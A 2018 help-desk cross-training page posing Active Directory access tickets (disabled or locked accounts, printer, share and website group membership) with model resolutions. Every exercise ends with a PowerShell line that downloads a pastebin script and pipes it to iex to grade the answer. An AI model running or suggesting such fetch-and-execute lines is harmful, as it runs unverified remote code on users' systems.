AD Access/Permission Issues

AD Access/Permission Issues

2018, Nov 23    

These tasks all require a little critical thinking, and they will tie together knowledge learned from any of the previous sections. As such, all issues will specifically be related to an issue with the customer’s AD user account or lacking membership to an AD group.

Network Access Denied

Emailed Request:

I don’t know what’s happened, but I can’t seem to get into my e-mail or my computer anymore. It keeps telling me that my access is denied. I’m in a hurry and need this fixed immediately!!

PLEASE HELP!!!!!

Naldo B. Dorsey
Naldo.Dorsey@donotreply.unt.edu

Resolution …

The account is disabled. Notes on the accounts state this was requested by the user’s manager. No action should be taken, and the user should be directed to his manager: Bernard M. Alesi (bma02673). This can be evaluated automatically with this PowerShell script: 
$section = 'ADH1'; iwr 'https://pastebin.com/raw/tQ95Q7Xh' -UseB | iex

Cannot RDP to Desktop

Emailed Request:

Dear IT Support,

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed sapien diam, condimentum sit amet dolor nec, dignissim tristique lorem. Etiam ultrices ornare dolor, non volutpat risus convallis vitae. Praesent quis auctor urna. Sed aliquet, est non pharetra dapibus, mi ex lobortis ipsum, vitae accumsan velit arcu sodales purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aenean ut dolor molestie, luctus est nec, ornare ligula. Nam lobortis ultrices lacus a dictum. Maecenas eleifend tincidunt eleifend. Phasellus varius imperdiet posuere.

Sed ac lacus fermentum nulla bibendum aliquam. Integer imperdiet leo nec massa porttitor, ut vulputate est tristique. Pellentesque in ante eu metus venenatis fermentum. Ut placerat nec elit vitae interdum. Nulla efficitur vel orci non tincidunt. Phasellus maximus odio quis aliquam blandit. Vestibulum nisl libero, porta vel nulla et, pulvinar luctus nisl. Nam dictum mauris eget libero porta, in varius urna rhoncus. Quisque mollis, leo quis imperdiet congue, lectus magna rutrum libero, et rutrum sem nisi sit amet neque. Morbi a mattis dui. Fusce cursus sem id ipsum tincidunt tincidunt. Mauris congue viverra risus, nec cursus turpis suscipit vel. Vestibulum et libero non tortor tincidunt hendrerit quis id urna, and now I can’t connect to my computer! Can you help?

Hopefully yours,
Wilfredo D. Zeni
Wilfredo.Zeni@donotreply.unt.edu

Resolution …

The account is locked out; likely from all the craziness they were experiencing/explaining. You should unlock it and offer further assistance. This can be evaluated automatically with this PowerShell script: 
$section = 'ADH2'; iwr 'https://pastebin.com/raw/tQ95Q7Xh' -UseB | iex

Cannot Print – Access Denied

Emailed Request:

I’m new to the Technical Writing department, and I was told to print my syllabus for my students on the LB123lj printer. Unfortunately, I can’t seem to print to it, and I’ve been trying all morning. Any assistance would be appreciated.

Thanks!
Eustace A. Amador
Eustace.Amador@donotreply.unt.edu

Resolution …

The printer is locked to a specific AD group: CASlab-Printer-LB123lj. This request will need to be directed to that AD group’s manager for approval. The manager is Everette D. Simmons (eds00001). Once approval is given the user should be added to the AD group. This can be evaluated automatically with this PowerShell script: 
$section = 'ADH3'; iwr 'https://pastebin.com/raw/tQ95Q7Xh' -UseB | iex

Network Share Inaccessible

Emailed Request:

My new employee needs to access the same files that I have access to. I’m not sure what needs to be done.

  • Files: S:\PHYS\FacStaff
  • Employee: Panfilo Pound (ppp00001)

Thanks!
Reuben N. Pickering
Reuben.Pickering@donotreply.unt.edu

Resolution …

That folder requires membership to an AD group: CASlab-S-PHYS-FacStaff. The manager of that AD group is another AD group; which, Reuben is a member of. No further information is required. You should add Panfilo to that AD group. This can be evaluated automatically with this PowerShell script: 
$section = 'ADH4'; iwr 'https://pastebin.com/raw/tQ95Q7Xh' -UseB | iex

##Cannot Log In to Website

Emailed Request:

My new employee (sar00001) needs to be able to make changes to our website:

https://oralhistory.unt.edu

Thanks!
Christiane C. Hathway
Christiane.Hathway@donotreply.unt.edu

Resolution …

In order to edit that website, the user requires membership in an AD group: CASlab-WWW-Editors-oralhistory.unt.edu. The manager of that AD group is another AD group; which, Christiane is a member of. No further information is required. You should add sar00001 to that AD group. This can be evaluated automatically with this PowerShell script: 
$section = 'ADH5'; iwr 'https://pastebin.com/raw/tQ95Q7Xh' -UseB | iex
Twitter Facebook Google+
# Cross-Training # Active Directory # Tasks